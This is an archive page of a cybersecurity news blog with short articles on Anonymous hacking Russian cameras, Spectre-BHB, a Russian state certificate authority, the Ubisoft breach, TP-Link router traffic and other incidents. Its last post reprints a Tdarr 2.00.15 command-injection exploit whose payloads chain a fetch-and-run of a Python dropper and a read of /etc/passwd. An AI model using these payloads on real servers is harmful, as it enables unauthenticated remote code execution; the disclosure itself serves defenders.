Monday, January 20, 2025
Home Blog Page 40

Anonymous sent 7 million texts to Russians plus hacked 400 of their security cams

By
Steven Black (n0tst3)
-
0

Anonymous and its affiliate groups have sent 7 million text messages to Russian citizens about the war in Ukraine while another group has hacked 400+ security cameras in the country with anti-war messages.

Anonymous hacktivists are claiming to have hacked into hundreds of public surveillance cameras installed across Russia to post messages against the Russian president Vladimir Vladimirovich Putin and in support of Ukraine.

It is worth noting that the hacktivists originally announced the hack on March 7th however at the time of publishing this article, most targeted cameras were still compromised and displaying content left by the group.

Details of the Hack

According to Anonymous, the group has compromised more than 400 security cameras in Russia and displayed anti-propaganda messages. The hacktivist collective has also compiled live feeds from 100+ Russian CCTV cameras and posted them on the newly launched website.

Multiple surveillance cameras show anti-Putin messages (Image: Hackread.com via Anonymous)

Apart from running live feeds of compromised security cameras; the website also explains why these cameras were hacked and how Anonymous supports Ukraine in the ongoing conflict between two countries.

The point of this leak is solely to spread information to the Russian people, and potentially (although unlikely) use these cameras for recon. Since most of these cameras are in deep Russia (and some near the border cities of Ukraine), this is mainly a large anti-propaganda movement. We are however working on cameras in Belarus, Ukraine, and closer to the Ukraine conflict in Russia, that will be used entirely for Recon for the Ukrainian military. That dump will come next.

Anonymous

Cameras Across multiple Sectors Hacked

The group claims it is trying to hack security cameras in Belarus, Ukraine, and regions closer to the Russian border and will use them to help the Ukrainian military conduct reconnaissance. 

Anonymous has categorized the hacked cameras into Businesses, Outdoor, Indoor, Restaurants, Offices, Schools, and Security Offices, which explains the extensiveness of hacking. In most cases, Anonymous superimposed English text messages over live feeds such as the following:

For your information, the 200RF.com website is set up by Ukrainian Internal Affairs Ministry to allow Russian relatives to identify Russian soldiers who either captured or died during the war.

Screenshot from a live camera feed shows a message left by Anonymous hacktivists (Image: Hackread.com via Anonymous)

7 Million Text Messages Sent to Russians

In another incident, Squad303, a newly formed digital army comprising Anonymous-associated programmers, sent out over 7 million SMS messages to cell phone numbers across Russia.

Anonymous Squad303 on Twitter

The group created a tool called 1920.in to allow non-technical individuals to contribute to #OpRussia, which is dubbed the world’s largest cyber operation to date. This campaign aimed to inform the Russian public about the war in Ukraine. Within 48 hours, the group sent out 2 million text messages, and by Tuesday, the SMS count reached 5 million.

In a video, Squad303 stated that they are trying to help Ukraine.

We have a message for the citizens of the free world: the legion is calling you. Ukraine needs you. You are the largest army in the history of the world. You don’t need any weapons or ammunition. Your weapons are smartphones and your ammo is messages sent to Russian citizens.

Anonymous – Squad303

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Since the recent invasion by the Russian’s, the anonymous collective have been behind a large number of high-profile hacks and DDoS’s targeting Russian infrastructure. We expect this to continue. Here are some related articles.

The Shadow Warriors: The Rise of Russian State Hackers
The Shadow Warriors: The Rise of Russian State Hackers
The Shadow Warriors: The Rise of Russian State Hackers
Bookmark
Please login to bookmarkClose

Exploit Bypasses Existing Spectre-V2 Mitigations in Intel, AMD, Arm CPUs

By
Steven Black (n0tst3)
-
0
vulnerability

Researchers have disclosed a new technique that could be used to circumvent existing hardware mitigations in modern processors from Intel, AMD, and Arm, and stage speculative execution attacks such as Spectre to leak sensitive information from host memory.

Attacks like Spectre are designed to break the isolation between different applications by taking advantage of an optimization technique called speculative execution in CPU hardware implementations to trick programs into accessing arbitrary locations in memory and thus leak their secrets.

While chipmakers have incorporated both software and hardware defenses, including Retpoline as well as safeguards like Enhanced Indirect Branch Restricted Speculation (eIBRS) and Arm CSV2, the latest method demonstrated by VUSec researchers aims to get around all these protections.

Called Branch History Injection (BHI or Spectre-BHB), it’s a new variant of Spectre-V2 attacks (tracked as CVE-2017-5715) that bypasses both eIBRS and CSV2, with the researchers describing it as a “neat end-to-end exploit” leaking arbitrary kernel memory on modern Intel CPUs.

“The hardware mitigations do prevent the unprivileged attacker from injecting predictor entries for the kernel,” the researchers explained.

“However, the predictor relies on a global history to select the target entries to speculatively execute. And the attacker can poison this history from userland to force the kernel to mispredict to more ‘interesting’ kernel targets (i.e., gadgets) that leak data,” the Systems and Network Security Group at Vrije Universiteit Amsterdam added.

Put differently, a piece of malicious code can use the shared branch history, which is stored in the CPU Branch History Buffer (BHB), to influence mispredicted branches within the victim’s hardware context, resulting in speculative execution that can then be used to infer information that should be inaccessible otherwise.

Spectre-BHB renders vulnerable all Intel and Arm processors that were previously affected by Spectre-V2 along with a number of chipsets from AMD, prompting the three companies to release software updates to remediate the issue.

Intel is also recommending customers to disable Linux’s unprivileged extended Berkeley Packet Filters (eBPF), enable both eIBRS and Supervisor-Mode Execution Prevention (SMEP), and add “LFENCE to specific identified gadgets that are found to be exploitable.”

“The [Intel eIBRS and Arm CSV2] mitigations work as intended, but the residual attack surface is much more significant than vendors originally assumed,” the researchers said.

“Nevertheless, finding exploitable gadgets is harder than before since the attacker can’t directly inject predictor targets across privilege boundaries. That is, the kernel won’t speculatively jump to arbitrary attacker-provided targets, but will only speculatively execute valid code snippets it already executed in the past.”

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Russia Uses New State-run TLS Certificate Authority to Avoid Sanctions

By
Steven Black (n0tst3)
-
0

The Russian government has established its own TLS certificate authority (CA) to address issues with accessing websites that have arisen in the wake of sanctions imposed by the west following the country’s unprovoked military invasion of Ukraine.

According to a message posted on the Gosuslugi public services portal, the Ministry of Digital Development is expected to provide a domestic replacement to handle the issuance and renewal of TLS certificates should they get revoked or expired.

The service is offered to all legal entities operating in Russia, with the certificates delivered to site owners upon request within 5 working days.

TLS certificates are used to digitally bind a cryptographic key to an organization’s details, enabling web browsers to confirm the domain’s authenticity and ensure that the communication between a client computer and the target website is secure.

The proposal comes as companies like DigiCert have been restricted from doing business in Russia following sanctions by Western nations. Cybersecurity firms AvastESETFortinet, and Imperva have also suspended operations in Russia and Belarus over the Kremlin’s invasion of Ukraine.

“In response to the evolving geopolitical situation in Ukraine, DigiCert is pausing issuance and reissuance of all certificate types affiliated with Russia and Belarus. This includes suspending issuance and reissuance of certificates to TLDs related to Russia and Belarus, as well as to organizations with addresses in Russia or Belarus,” the public key infrastructure (PKI) provider noted in an advisory.

This includes suspending issuance and reissuance of certificates to top-level domains (TLDs) related to Russia and Belarus, counting .by, .moscow, .ru, .ru.com, .ru.net, .su, .tatar, .бел, .москва, .рус, and .рф.

What’s not clear is whether web browsers such as Google Chrome, Microsoft Edge, Mozilla Firefox, and Apple Safari, intend to accept the certificates issued by the new Russian certificate authority so that safe connections to the certified servers can work as intended.

But according to a tweet shared by Juan Andres Guerrero-Saade, principal threat researcher at SentinelOne, the public services agency is recommending the use of Russian browsers like Yandex and Atom. “To have access to all sites and the necessary online services, including public services, we recommend installing browsers that support the Russian certificate,” the email reads.

This also poses significant risks in that it could be potentially weaponized to carry out man-in-the-middle (MitM) on HTTPS sessions originating from internet users in the nation, enabling the relevant authorities to intercept, decrypt, and re-encrypt the traffic passing through its systems.

“This is insane. Is this the full totalitarian Man-in-the-Middle?,” Guerrero-Saade tweeted.

The development also comes close on the heels of disclosures from Cisco Talos that opportunistic cybercriminals are cashing in on the ongoing conflict to target unwitting users seeking tools to carry out their own cyberattacks against Russian entities by offering malware purporting to be offensive cyber tools.

“The global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations,” the researchers said.

“These observations serve as reminders that users must be on heightened alert to increased cyber threat activity as threat actors look for new ways to incorporate the Russia-Ukraine conflict into their operations.”

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Bookmark
Please login to bookmarkClose

UK Network Operators Target iCloud Private Relay in Complaint to Regulator

By
Steven Black (n0tst3)
-
0

A group of UK network operators have formally urged the UK’s Competition and Markets Authority (CMA) to regulate iCloud Private Relay, claiming that Apple’s privacy service is anti-competitive, potentially bad for users, and a threat to national security.

In its response to the CMA‘s Interim Report on mobile ecosystems, Mobile UK, a trade association of British mobile network operators, including EE, Virgin Media O2, Three and Vodafone, has raised concerns that ‌iCloud‌ Private Relay can have a negative impact on user experience, internet safety, and competition.

‌‌iCloud‌‌ Private Relay was new service introduced with iOS 15 that ensures all traffic leaving an ‌iPhone‌, ‌iPad‌, or Mac is encrypted using two separate internet relays, so that companies cannot use personal information like IP address, location, and browsing activity to create a detailed profile about users.

Following a formal complaint about Private Relay from Microsoft, Mobile UK claims that the privacy service can have undesired side-effects for users: “Private Relay affects Apple users in many ways, beyond simply what level of privacy a user wants.” For example, “Apple users have suffered a worse browsing experience when using Private Relay.” This is alleged to have the potential to push users to “migrate” away from “the Safari browser to apps downloaded from the App Store where Apple can earn a commission.”

Private Relay prevents network providers from seeing the network traffic from Safari and unencrypted applications. In preventing network operators from seeing this traffic, Mobile UK says that Private Relay prevents service providers from understanding “demand patterns across mobile networks,” inhibiting their ability to effectively diagnose customer issues.

Moreover, Private Relay is alleged to compromise “content filtering, malware, anti-scamming and phishing protection provided by network providers.” Mobile UK also claims that Private Relay is a threat to national security, since it “impairs the insights available under the Government’s investigatory powers, with implication for law enforcement” with regards to “terrorism, serious organized crime, child sexual abuse, and exploitation.”

Private Relay purportedly allows Apple “to leverage its considerable market power into many areas of the market and thus being able to further entrench its position.” Mobile UK says that due to Private Relay, “providers will be unable to use the traffic data to develop their own competing mobile browsers in the future,” as well as other services that directly compete with Apple:

Network providers would no longer be able to use web traffic data over Safari to develop their own digital products and services that complete directly with Apple. For example, a network provider may no longer have access to information about a user’s content viewing habits to develop their own content that competes with Apple TV. Similarly, a network provider may no longer be able to share consumer insight with third parties that provide digital advertizing services in competition with Apple Search Ads…

Mobile UK asserts that the ability of UK Internet Service Providers (ISPs) “to differentiate and compete in the market on fair terms” is actively undermined by Private Relay since Apple is effectively becoming an ISP itself:

Apple unilaterally terminates the role of the mobile and fixed connectivity provider in resolving the internet connection, with Apple itself taking over the role of the ISP. The mobile and fixed connectivity provider’s role is reduced to providing conveyance from the handset/home to the Apple iCloud platform.

Mobile UK is concerned that “Apple could thus leverage its position in the device and operating system to grow its ‌iCloud‌+ user based to develop its position as an ISP.”

Moreover, the trade association said that Private Relay directs users to more Apple services, “accessing the internet in a manner curated by Apple.” Private Relay enables Apple “to favor its own proprietary applications and service, at the expense of other providers.”

Mobile UK also said that Private Relay “affects competition in mobile browsers,” highlighting that “rival browsers cannot differentiate themselves easily” as a result of Apple’s WebKit browser engine restriction. The organization complains that users cannot “switch to an alternative browser” to skirt Private Relay since “the ability of rival browser to differentiate themselves from Safari will still be limited by the terms of Apple’s browser engine.”

In conclusion, the trade association says that Private Relay must be regulated beyond its superficial existence as a privacy service:

Mobile UK is very concerned that consumers are not fully informed about how Private Relay works or that they understand the full implications of invoking the services…

[…]

The impact of Private Relay is therefore multi-dimensional and cannot be assessed solely through a privacy lens.

Mobile UK urged the CMA to implement “a remedy that limits the use of Private Relay,” or “at the very least” prevent “Apple from making Private Relay a default-on service.” The complaint noted that “Private relay is currently default-off but it is already being used by a significant portion of Apple customers in the UK, despite being in beta mode.”

Private Relay should not be presented as a set up option or installed as an on-default service. It should be made available as an app with others can compete with similar services such as VPNs. Apple should notify relevant third parties in advance of introducing Private Relay services, so that third parties can inform their customers of how their service may change were Private Relay to be used. For example, advance warning of the introduction of Private Relay would have allowed network providers to inform customers how their security solutions may change and also inform Government how it changes their investigatory powers insight from network traffic data.

For more information, see Mobile UK’s full submission to the CMA. ‌iCloud‌ Private Relay has come under similar skepticism in the European Union, where major mobile operators sought the banning of Private Relay for infringing upon EU “digital sovereignty.”

Earlier this week, Apple aggressively defended its ecosystem in its detailed response to the CMA. It said that the regulator had set the benefits of Apple’s ecosystem aside “without reasoned basis, either ignoring them entirely or dismissing them on the basis of nothing more than speculation.” Apple alleged that the CMA’s Interim Report was based on “unsubstantiated allegations and hypothetical concerns raised primarily by self-serving complaints” from a handful of multi-billion dollar companies, “all seeking to make deep changes to the ‌iPhone‌ for their own commercial gain, without independent verification.”

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Ubisoft Breach – ‘cyber security incident’, Developers Reset Staff Passwords

By
Steven Black (n0tst3)
-
0
databreach

Video game developer Ubisoft has confirmed that it suffered a ‘cyber security incident’ that caused disruption to its games, systems, and services.

The announcement comes after multiple Ubisoft users had reported issues last week accessing their Ubisoft service.

Data extortion group LAPSUS$, who has claimed responsibility for hacking Samsung, NVIDIA, and Mercado Libre thus far, appears to be behind this incident.

Ubisoft Breach: Developers Initiate ‘company-wide password reset’

Video game production giant Ubisoft states it experienced a cyber security incident sometime last week.

“Last week, Ubisoft experienced a cyber security incident that caused temporary disruption to some of our games, systems, and services,” says the company in a succinct news release.

“Our IT teams are working with leading external experts to investigate the issue. As a precautionary measure we initiated a company-wide password reset.”

Headquartered in Montreuil with its studios around the world, the game maker has repeatedly produced hit titles including Assassin’s Creed, Far Cry, For Honor, Just Dance, Prince of Persia, Rabbids, Rayman, Tom Clancy’s, and Watch Dogs.

On March 4th, users on Twitter and Downdetector did report issues accessing some of the Ubisoft services, that appear to be linked to this incident:

At this time, there is no evidence indicating any personal information of players was exposed during the incident.

The company confirms that all Ubisoft games and services are now functioning normally.

LAPSUS$ group reacts to the disclosure

News of Ubisoft confirming the cyber security incident was first reported by The Verge.

Moments later, admins of what is believed to be Lapsus$‘ Telegram group reacted to The Verge’s initial report with a smirk emoji, insinuating that Lapsus$ is behind the hack:

Lapsus$ has previously leaked gigabytes of proprietary data purportedly stolen from leading companies as Samsung, NVIDIA, and Mercado Libre confirmed this month they had suffered a breach.

Data extortion groups like Lapsus$ breach victims but as opposed to encrypting confidential files like a ransomware operator would, these actors steal and hold on to victims’ proprietary data, and publish it should their extortion demands not be met.

In 2020, Egregor ransomware had hit game developer Crytek and leaked what they claim were files stolen from Ubisoft’s network. Although, at the time, Ubisoft did not confirm the authenticity of the claim.

In this case, however, it does not seem that Lapsus$ or any other threat actor was able to obtain Ubisoft’s proprietary data, and the investigation continues.

Go to Cybersecurity Knowledge Base

Got to latest Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

TP-Link Privacy Violation: Router Sends Data To 3rd Parties Without Consent

By
Steven Black (n0tst3)
-
0

China’s network equipment manufacturer TP-Link Router is also a German antivirus software company Avira “We are developing a security service in partnership with Avira”. However, there is a report posted on Reddit on the overseas bulletin board that “TP-Link routers are sending a large amount of traffic to Avira’s server even if related services are turned off.” It has become a hot topic.

Privacy Concerns, Violation of GDPR.

TP-Link Routers Send ALL Your Web Traffic To 3rd Party Servers

I recently enabled a DNS gateway to be able to see requests from my router, and network devices. Was surprised to find 80K + requests (in 24 hours) out to an Avira “Safe Things” subdomains *.safethings.avira.com (far more than any other server).

Digging into this more, I found that it is related to the built-in router security “Home Shield” that ships with newer TP-Link routers – https://oem[.]avira.com/en/solutions/safethings-for-router-manufacturers

Here is the kicker though, I have the Avira / Home Shield services completely turned off (I wasn’t even subscribed to their paid service for it). The router doesn’t care, and sends ALL your traffic to be “analyzed” anyhow. See this response from TP Link (towards bottom of review) from last year – https://www.xda-developers[.]com/tp-link-deco-x68-review/#:~:text=TP%2DLink%20says%20the%20network%20activity Update: I emailed reviewer to confirm TP-Link never updated him after.

I contacted support about this again, and was given a non-answer about how the requests are to check subscription status. 80K + requests a day to check subscription status? Also the rate of requests is not constant, it is higher when my internet traffic is higher. To me this lack of consistent answer / response from TP-Link is as concerning as the requests themselves.

I’m not seeing much online about this issue, as I don’t think many people realize it is even occurring (since traffic is outgoing straight from router, as opposed to an individual computer). Hoping to gain some attention on this issue and get a real answer / response from TP-Link about what exactly is going on here. As well as a concrete timeline and promise for a fix to stop these outgoing requests, when we aren’t even using their anti-virus services.

Edit: Additional details, this is on their WiFI 6 AX3000 (Archer AX55) Router. From the XDA Review looks like this is also happening on their Deco series. If you want to easily check your own router, you can use any DNS Gateway (NextDNSCloudflare Gateway Pi-Hole etc.) Just be sure to set the DNS servers under “Advanced->Network->Internet->Advanced Settings” because the DHCP DNS server setting will only apply to the devices inside the network, not the router itself.

Edit #2: I’ve also contacted Avira directly regarding the endpoints, in the hope that they’ll be more straightforward than TP-Link about the purpose. Will update here when I receive a response.

Edit #3: If anyone knows of good industry contacts, who can dig into this more or get real answers, please send a message! I’ve seen GamerNexus brought up a few times, but don’t see any contact method.

Comment from user on reddit, no source: TP-Link says the network activity is due to “the Avira cloud data base [distinguishing] whether [the network request is] secure data or malware.” A firmware update is in the works that will turn this functionality off if no Avira network features are enabled in the app, but there is no estimated timeline for that yet.

transcribed from reddit

Our Conclusion

At this time, we are yet to fully conclude this, however, it is very clear that this device sends user data to a third party without permission/consent. This would be a clear violation, at the very least of the General Data Protection Regulation (GDPR) rules. Germany-based Avira said it would have to modify its services because it needs to be GDPR compliant.

source

Go to Cybersecurity Knowledge Base

Got to latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

War and Inflation Threaten World Economy

By
Steven Black (n0tst3)
-
0

The war and sanctions, which include a US ban on Russian oil imports, are raising prices of energy and other key commodities

The world economy’s fragile recovery from the Covid-induced crisis is now threatened by Russia’s war in Ukraine and soaring commodity prices.

Here are four questions regarding the risks to global GDP:

– Will growth stall? –

“The war happened right at a time when Europe and the US had a recovery that was going really well. Projections in Europe were among the highest … (in) the last 20 years,” said Jacob Kirkegaard, resident senior fellow with the German Marshall Fund of the United States in their Brussels office.

In just two weeks, the war has had a “material impact” on the economy, European Central Bank chief Christine Lagarde said Thursday, revising the growth outlook for the eurozone to 3.7 percent for 2022, from 4.2 percent forecast in December.

The war and sanctions, which include a US ban on Russian oil imports, are raising prices of energy and other key commodities like wheat, fertilisers and metals to surge, International Monetary Fund chief Kristalina Georgieva said.

That comes “on top of already high inflation,” Georgieva said.

“We got through a crisis like no other with the pandemic. We are now in an even more shocking territory.”

Credit rating agency S&P has cut its projection for global growth this year to 3.4 percent — a decline of 0.7 percentage points over its earlier forecast due to the expected slump in Russia’s sanctions-hit economy and rising energy costs.

Moreover, the cost of hosting Ukrainian refugees and budgetary aid will cost the European Union 175 billion euros ($192 billion), economist Jean-Pisani Ferry from the Paris-based Bruegel Institute think-tank said.

“I don’t think that global economy will go into a recession,” said Kirkegaard.

But he warned of the threat from stagflation — persistently high inflation combined with high unemployment and stagnant demand.

– Why are prices soaring? –

Inflation has been rising worldwide for a year — due to Covid-linked disruptions in supply chains, leading to a spurt in the prices of raw materials which have raised production costs.

The war has sent oil and gas prices soaring, threatening to worsen inflationary pressure.

Federal Reserve Chair Jerome Powell told the US Congress that every $10 hike in oil prices would impact growth by 0.1 percentage points and add 0.2 percentage points to inflation.

The United States recorded 7.9 percent inflation in February — a new 40-year high.

“We are facing an oil shock, a gas shock and an electricity shock. This has never happened together,” said Thomas Pellerin-Carlin, director the Jacques Delors energy institute.

Apart from oil and gas, other key commodities have been affected, with prices of aluminium, nickel and wheat skyrocketing.

Russian President Vladimir Putin on Thursday warned of inflationary pressures worldwide as a result of the Western sanctions on his country.

Several key industries have already been hit, with several steel plants in Spain shutting down due to high energy prices.

Millions of households are finding it more expensive to travel, heat their homes and bring food to the table.

“The price of bread went up enormously” since the war began, said Omar Azzam, a Cairo resident, referring to a 50 percent hike in a country which is the world’s top wheat importer.

– More stimulus on the way? –

Nations launched huge stimulus programmes to prevent their economies from crumbling after the pandemic emerged in 2020.

But government are loath to dig much deeper into public finances.

Aid will likely be more targeted. The G7 group of industrialised nations, for instance has called for massive support to households slammed by energy costs.

Emerging nations, however, will be more fragile and vulnerable to inflation and even political instability, experts warn.

– Is Covid still a threat? –

While many countries are easing Covid restrictions, China has been doing the opposite.

The world’s second biggest economy on Friday locked down Changchun, a city of nine million people, to control a fresh wave of coronavirus.

If such measures continue, they will hit the world hard, warned Kirkegaard.

“The Chinese economy will slow dramatically, China will shut down whatever they need to shut down,” he said.

“It is as big and unknown as the war in Ukraine because unlike Europe and the US that are able to live with Covid, it is certainly not the case in China,” he said.

Bookmark
Please login to bookmarkClose

Canadian NetWalker Ransomware Operator Extradited to U.S

By
Steven Black (n0tst3)
-
0
ransomware

Charges against the individual – Sebastien Vachon-Desjardins, 34, of Gatineau, Quebec, Canada – were announced last year, when law enforcement authorities in the U.S. and Europe seized the dark web sites used in the NetWalker ransomware operations.

Offered under the ransomware-as-a-service (RaaS) business model, NetWalker – also known as Malito – emerged in 2019 and has been involved in a variety of high-profile attacks, including ones targeting education, government, health, and public transportation organizations.

The U.S. Department of Justice said that dozens of entities worldwide were hit by NetWalker, which “specifically targeted the healthcare sector during the COVID-19 pandemic, taking advantage of the global crisis to extort victims.”

According to court documents, Vachon-Desjardins was involved in the NetWalker operations between April and December 2020.

He was arrested on January 27, 2021. During the search of Vachon-Desjardins’s home in Gatineau, Canadian law enforcement officers discovered and seized 719 Bitcoin – currently valued at roughly $28 million – and $790,000 in Canadian currency.

The investigators also seized over 20 terabytes of data from Vachon-Desjardins’s computers, which led to the identification of 17 compromised Canadian companies.

On January 31, during a video hearing in a Canadian court, the defendant pleaded guilty to three of the charges brought against him. He was sentenced to seven years in prison and ordered the forfeiture of most of the seized Bitcoin, computers, and cash, and the restitution of over $2.6 million in Canadian currency.

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Open Database Leaves Major Chinese ports Exposed to Shipping Chaos

By
Steven Black (n0tst3)
-
0

The freight logs of two major Chinese shipping ports have been leaking data, a problem which if left unresolved could disrupt the supply chain of up to 70,000 tonnes of cargo a day, with potentially serious consequences for international shipping.

The cybernews® research team identified an open ElasticSearch database, which contained more than 243GB of data detailing current and historic ship positions that is exposed to the public. Analyzing the data, the team determined that it is highly likely to belong to the Yangtze river ports of Nanjing and Zhangjiagang.

The discovery is especially timely, given the escalation of the geopolitical situation caused by Russia’s recent decision to invade Ukraine. “This could have gone very badly if bad guys had found it before we did,” said a spokesperson for Cybernews.

ElasticSearch lacks a default authentication and authorization system – meaning the data must be put behind a firewall, or else run the risk of being freely accessed, modified or deleted by threat actors. The push access logs of the zjgeport[.]com found on the database contained user IDs and, most importantly, API keys that could in theory permit universal access, allowing a cybercriminal to write new data about current ship positions.

Chinese Ports Exposed

In layman’s terms, what this means is that if left unplugged, the gap could allow threat actors to read, delete or alter any of the entries in the exposed databases – or even create new ones for cargoes or ships that don’t exist. Moreover, conventional criminals could physically hijack a ship and jam its communications, leaving the port that controls and tracks its movements unaware that the vessel had been boarded.

That in turn could jeopardize up to 3,100 vessels that transport more than 250 million tonnes of cargo annually to and from the two ports – not to mention putting at risk the lives of the estimated 40,000 passengers a year that use Nanjing for sea travel.

The Cybernews team said: “Because of the way ElasticSearch architecture is built, anybody with access to the link has full administrator privileges over the data warehouse, and is thus able to edit or delete all of the contents and, most likely, disrupt the normal workflow of these ports.

“Because both of these ports directly connect factories based in China to international waters, it’s more than likely that they carry international cargo, thus creating a butterfly effect likely to affect the whole supply chain worldwide if the open instance is not closed.”

Zhangjiagang’s main cargoes include steel, timber, coal, cement and chemical fertilizers, while Nanjing typically trades in goods such as metal ore, light industrial goods, petroleum and pharmaceutical products. With Russia having incurred global sanctions as a result of its invasion of Ukraine, the fate of China’s economy will be more important than ever as it seeks to fill the vacuum created by its superpower neighbor’s expulsion from the world stage.

Since being alerted to the problem by Cybernews, the owners of the ElasticSearch database have enforced HTTP Authentication as a requirement for access, effectively cutting it off from the public side of the internet.

Related Reading: Prolific Chinese APT Caught Using MoonBounce UEFI Firmware Implant

Original Post @CyberNews

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Tdarr 2.00.15 – Command Injection

By
Steven Black (n0tst3)
-
0
vulnerability
# Exploit Title: Tdarr 2.00.15 - Command Injection

# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE
Bookmark
Please login to bookmarkClose
1...394041...79Page 40 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.